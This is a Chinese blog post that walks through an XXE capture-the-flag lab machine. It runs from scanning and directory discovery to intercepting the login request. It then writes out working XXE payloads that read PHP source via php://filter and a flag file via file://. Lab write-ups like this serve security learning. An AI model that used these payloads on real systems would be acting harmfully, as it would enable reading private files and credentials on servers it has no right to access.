今天做了一个好玩的xxe靶机

于 2024-07-25 20:12:04 发布
阅读量287 收藏 3
点赞数 8
分类专栏: xxe 文章标签: android android studio ide xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lhdbk______/article/details/140698906
版权
靶机:http://192.168.238.129/
1.安装好虚拟机后,查看网卡IP

2.寻找IP地址端口扫描:80

使用御剑2014/nmap -sP IP/24

获得地址我们发现界面有一个存储路径

3.目录扫描

查看IP地址下的目录

/robots.txt目录下,发现还有/xxe和/admin.php

先访问一下/xxe,进入一个登陆界面

4.抓包
  • 发现数据以post方式提交,且有xxe代码,发送到repeater
  • 我们用到首页内个默认路径,可以获取php界面源代码

<!DOCTYPE foo [

<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/xxe/index.php">

]>

<name>&xxe;</name>

  • 发现可以得到64位进行编码的源码,所以我们也可以解析/admin.php
  • <!DOCTYPE foo [

<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/xxe/admin.php">

]>

<name>&xxe;</name>

5.base64解码
  • 得到用户名、密码和flag的php

  • 访问flag的php查看源代码

  • 先进行32位解码再进行64位得到路径:

/etc/.flag.php

6.再次抓包

<!DOCTYPE foo [

<!ENTITY xxe SYSTEM "file:///etc/.flag.php">

]>

<root><name>&xxe;</name>

它是php编码,所以创建一个文件

得到一个{xxe_is_so_easy}

想玩的话可以私信。

lhdbk______
关注
  • 8
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xxe靶机漏洞复现
千寻的博客
05-25 1255
0x00 XML介绍 可扩展标记语言,标准通用标记语言的子集,简称XML。 是一种用于标记电子文件使其具有结构性的标记语言。 在电子计算机中,标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。 它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 它非常适合万维网传输,提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据。 是Internet环境中跨平台的、依赖于内容的技术,也是当今处理分布式结构信息的有效工具。 早在1998年
vulnhub之XXE靶机详解
天天学安全专属博客
03-20 719
vulnhub之XXE靶机详解
XXE靶机详解
like_niustyle的博客
09-14 610
常规思路:先扫描端口,扫描目录 这里有点迷惑了,我用nessus扫了一遍扫出来两个开放端口:80和5335,。但是用nmap只扫描出来了一个80 端口 不知道是什么原因,有懂的大佬可以解释一下 不管了,根据后面的结果来看端口多一个一个完全不影响 照例访问80: 没啥用,apache默认页面 端口5335访问不了 接下来扫目录,御剑和dirb都可以,看用什么系统了 index.html依然是apache的默认界面 robots.txt: xxe是目录,admin.php是页面 xxe: xx
XXE靶机夺取Flag复现
a1245678899的博客
10-15 603
1.首先用netdiscover对kali同一网段的进行探测。15.将其编入文档进行后进行访问得到flag.5.对这两个目录进行访问发现了两个登录页面。6.使用burpsuit对其进行抓包处理。14.对其进行base64解码发现。12.对其进行解码发现新的路径。13.进行重发以后的到新的代码。4.发现了两个禁止访问的目录。
XXE超详细讲解 全网仅此一份
07-06
为了触发XXE漏洞,通常需要一个支持外部实体解析的环境,例如CentOS 6.5 Linux系统,运行Apache中间件,并且应用程序使用XML解析器。常见的检测思路包括: 1. **内部DTD+参数外部实体**:在XML文档中使用`<!DOCTYPE>...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
总之,XXE漏洞是一个严重的安全问题,需要开发者和安全人员重视。理解其原理、危害、检测和利用方式,以及如何修复和防御,对于保障信息系统安全至关重要。对于初学者,通过实践靶场可以更好地理解和掌握XXE漏洞的...
XXE - 防御策略-01
09-15
XXEXml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 从 2018 年...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
下面是一个简单的请求 XML 实例: <!DOCTYPE foo SYSTEM "http://192.168.1.103/test.dtd"> <foo>&e1; 在这个实例中,我们使用了 DOCTYPE 定义了外部实体 foo,并将其引用的 URL 设置为 ...
Android】广播机制
最新发布
2301_79977698的博客
07-24 508
Android中,广播(Broadcast)是一种消息,任何应用程序都可以发送广播消息,任何应用程序也都可以接收广播消息。广播通常用于通知应用程序某些事件的发生,比如系统启动、电量低、网络状态改变等。Broadcast Receiver(广播接收器):用于接收广播消息并响应这些消息的组件。Intent(意图):用于传递广播消息的数据结构。标准广播(Normal Broadcast)是完全异步的,所有接收器几乎同时接收广播,并且接收顺序是不确定的。
Android DataBinding从入门到精通
Dream的博客
07-22 1074
DataBinding可以更加方便的编写与视图交互的代码。即系统会为模块中的每个xml文件生成一个绑定类,其实例包含指向相应布局中具有ID的所有视图的直接引用。大多数情况下,DataBinding会代替findMyId。
Android 多用户问题
m0_54010212的博客
07-22 314
在工程模式下,可以使用 getInstalledPackages 或 getInstalledPackagesAsUser 方法获取全部已安装的应用程序,并展示给用户。List<MediaController> 在普通应用中可以获取到,但是在systemUI中获取不到。这个api解决 那为什么systemUI在 0这个组别?在systemserver 里启动的组别就是这个。音频mediassion相关是区分用户的。看了一下是 user组别问题导致的。那么还有没有什么是区别用户的。当然有 PMS也是这样。
【23】Android高级知识之Window(四) - ThreadedRenderer
mr_zengkun的博客
07-21 1066
ThreadedRenderer、WMS
DASCTF-BabyAndroid
Nike_name的博客
07-24 172
jpg隐藏解密函数,native层余弦变换什么什么的
Android 源码分析:ViewGroup
liufeismart2024的博客
07-23 288
如果要自定义ViewGroup,对添加到其中的View对应LayoutParams有特殊要求(如需要是MarginLayoutParams),可重写ViewGroup.generateDefaultLayoutParams()和ViewGroup.generateLayoutParams()如果调用的是ViewGroup.addView(View),会调用ViewGroup.generateDefaultLayoutParams()创建需要的LayoutParamas对象。
Android SurfaceFlinger——关联EGL三要素(二十七)
小旭的专栏
07-22 1901
经过前面的几篇文章我们呢了解了系统启动动画的播放流程,这里我们对 OpenGL ES 初始化流程总结如下:eglGetDisplay:加载 OpenGL ES 的 so 库,获取一个屏幕句柄对象。此时的 EGLDisplay 其实就是 egl_display_t,并且保存在数组中。eglInitialize:设置了EGLDisplay 的状态,同时初始化着色器缓存。eglChooseConfig:获取当前 OpenGL es 提供的参数中最佳参数。
android audio 相机按键音:(一)资源加载与替换
五味香的专栏
07-21 453
可以使用自定义资源文件,替换按键音资源。替换时,将自定义文件名称修改与系统文件名一致,但是文件格式必须一致。
Android SurfaceFlinger——GraphicBuffer初始化(二十九)
小旭的专栏
07-23 942
GraphicBuffer 对象封装了一块内存,这块内存可以用于存储像素数据,例如图像帧或者视频帧。它提供了跨进程传输的能力,使得不同进程之间可以共享同一块图形数据。简单来说,GraphicBuffer 是实现图形内容在硬件和软件层面上存储和传递的具体实现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值